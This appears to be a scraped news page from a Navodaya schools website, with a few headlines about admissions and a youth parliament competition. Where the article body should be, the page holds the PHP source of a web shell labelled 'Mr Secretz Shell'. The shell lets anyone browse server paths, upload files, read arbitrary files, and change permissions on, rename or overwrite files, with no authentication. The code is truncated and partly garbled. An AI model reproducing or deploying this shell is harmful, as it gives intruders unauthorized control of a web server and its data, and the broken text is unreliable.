Latest News
Lower Court orders Navodaya to give admission to the boy even though he failed in entrance test
Jawahar Navodaya Vidyalaya, Vaishali, Bihar won the 15th national youth parliament Competition
Harish Rawat distributes prizes in 15th National Youth Parliament Competition
Urdu Learning in Navodaya - coming soon
JNV - source of future IITians
RTE - JNV Enterance Test - Notice Issued
|
|
Lower Court orders Navodaya to give admission to the boy even though he failed in entrance test
Post Date:- 01 Jan 1970, 05:30
error_reporting(0);
set_time_limit(0);
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '
Mr Secretz Shell
Mr.21A shell
Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '/';
continue;
}
if($pat == '') continue;
echo '
if($i != $id) echo "/";
}
echo '">'.$pat.'/';
}
echo ' | ';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo 'Upload Berhasil ';
}else{
echo 'Upload Gagal ';
}
}
echo '
| ';
if(isset($_GET['filesrc'])){
echo "Current File : ";
echo $_GET['filesrc'];
echo ' |
';
echo(''.htmlspecialchars(file_get_contents($_GET['filesrc'])).' ');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo ' | '.$_POST['path'].'
';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo 'Change Permission Berhasil ';
}else{
echo 'Change Permission Gagal ';
}
}
echo '';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo 'Ganti Nama Berhasil ';
}else{
echo 'Ganti Nama Gagal ';
}
$_POST['name'] = $_POST['newname'];
}
echo '';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo 'Berhasil Edit File ';
}else{
echo 'Gagal Edit File ';
}
fclose($fp);
}
echo '';
}
echo '';
}else{
echo ' |